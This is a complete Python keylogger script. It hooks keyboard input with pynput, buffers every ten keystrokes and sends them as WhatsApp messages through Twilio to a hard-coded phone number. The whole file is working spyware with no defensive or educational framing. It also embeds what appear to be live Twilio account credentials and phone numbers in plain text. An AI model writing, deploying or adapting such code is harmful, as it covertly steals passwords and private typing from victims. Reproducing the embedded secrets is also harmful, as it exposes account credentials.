from pynput import keyboard
from twilio.rest import Client

TWILIO_ACCOUNT_SID = 'ACe193793d93ee411341a492f4b18b6a8b'
TWILIO_AUTH_TOKEN = '435498d3ecf35ba7aa4461f630d41f9b'
TWILIO_WHATSAPP_FROM = 'whatsapp:+14155238886'
WHATSAPP_TO = 'whatsapp:+59178634646'

client = Client(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN)

keystrokes = []
max_keys = 10

def send_whatsapp_message(message):
    try:
        client.messages.create(
            body=message,
            from_=TWILIO_WHATSAPP_FROM,
            to=WHATSAPP_TO
        )
        print("Mensaje enviado por WhatsApp.")
    except Exception as e:
        print(f"Error al enviar mensaje: {e}")

def on_press(key):
    try:
        keystrokes.append(key.char)
    except AttributeError:
        keystrokes.append(f"[{key.name}]")

    if len(keystrokes) >= max_keys:
        msg = ''.join(keystrokes)
        send_whatsapp_message(f"Teclas capturadas: {msg}")
        keystrokes.clear()

with keyboard.Listener(on_press=on_press) as listener:
    listener.join()